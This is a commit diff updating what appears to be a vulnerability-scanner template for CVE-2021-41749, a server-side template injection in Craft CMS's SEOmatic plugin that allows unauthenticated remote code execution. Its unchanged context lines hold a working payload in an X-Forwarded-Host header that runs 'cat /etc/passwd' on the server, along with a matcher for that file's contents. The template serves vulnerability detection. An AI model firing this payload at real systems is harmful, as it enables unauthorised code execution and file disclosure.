Update CVE-2021-41749.yaml
parent
438ecc5186
commit
fe6f534b69
|
@ -2,11 +2,10 @@ id: CVE-2021-41749
|
|||
|
||||
info:
|
||||
name: CraftCMS SEOmatic - Server-Side Template Injection
|
||||
author: iamnoooob, ritikchaddha
|
||||
author: iamnoooob,ritikchaddha
|
||||
severity: critical
|
||||
description: |
|
||||
In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side.Template Injection,
|
||||
allowing for remote code execution.
|
||||
In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.
|
||||
reference:
|
||||
- https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41749
|
||||
|
@ -41,6 +40,7 @@ http:
|
|||
X-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb
|
||||
Cache-Control: max-age=0
|
||||
|
||||
skip-variables-check: true
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
@ -48,12 +48,10 @@ http:
|
|||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
name: multiplication
|
||||
words:
|
||||
- '/{{marker}}{{result}}'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
name: lfi
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
|
Loading…
Reference in New Issue